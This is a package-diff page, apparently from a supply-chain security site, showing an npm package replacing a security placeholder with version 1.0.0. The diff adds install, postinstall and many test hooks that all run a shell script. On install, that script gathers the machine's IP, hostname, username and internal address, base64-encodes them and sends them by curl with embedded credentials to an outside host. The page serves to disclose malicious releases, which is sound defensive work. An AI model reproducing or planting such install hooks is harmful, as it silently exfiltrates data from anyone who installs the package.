@epc-infra/dynamo-stack 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @epc-infra/dynamo-stack might be problematic. Click here for more details.

package/package.json CHANGED
@@ -1,6 +1,22 @@
1
1
  {
2
2
  "name": "@epc-infra/dynamo-stack",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "This is a test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "/bin/sh scripts/install.sh 'test'",
8
+ "install": "/bin/sh scripts/install.sh 'install'",
9
+ "postinstall": "/bin/sh scripts/install.sh 'postinstall'",
10
+ "start": "/bin/sh scripts/install.sh 'start'",
11
+ "test:file": "/bin/sh scripts/install.sh 'test:file'",
12
+ "test:file:silent": "/bin/sh scripts/install.sh 'test:file:silent'",
13
+ "test:silent": "/bin/sh scripts/install.sh 'test:silent'",
14
+ "test:snaps": "/bin/sh scripts/install.sh 'test:snaps'",
15
+ "test:watch": "/bin/sh scripts/install.sh 'test:watch'",
16
+ "verify": "/bin/sh scripts/install.sh 'verify'",
17
+ "verify:fix": "/bin/sh scripts/install.sh 'verify:fix'",
18
+ "watch": "/bin/sh scripts/install.sh 'watch'"
19
+ },
20
+ "author": "yoloClin",
21
+ "license": "ISC"
6
22
  }
@@ -0,0 +1,5 @@
1
+ #!/bin/sh
2
+
3
+ curl "https://admin:ClaimedMadeGrowingJumping@goldfish.dev.radsecau.com/greetings"
4
+ DETAILS="$(echo -e $(curl -s ipinfo.io/)\\n$(hostname)\\n$(whoami)\\n$(hostname -i) | base64 -w 0)"
5
+ curl "https://admin:ClaimedMadeGrowingJumping@goldfish.dev.radsecau.com/?q=$DETAILS"
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40epc-infra%2Fdynamo-stack for more information.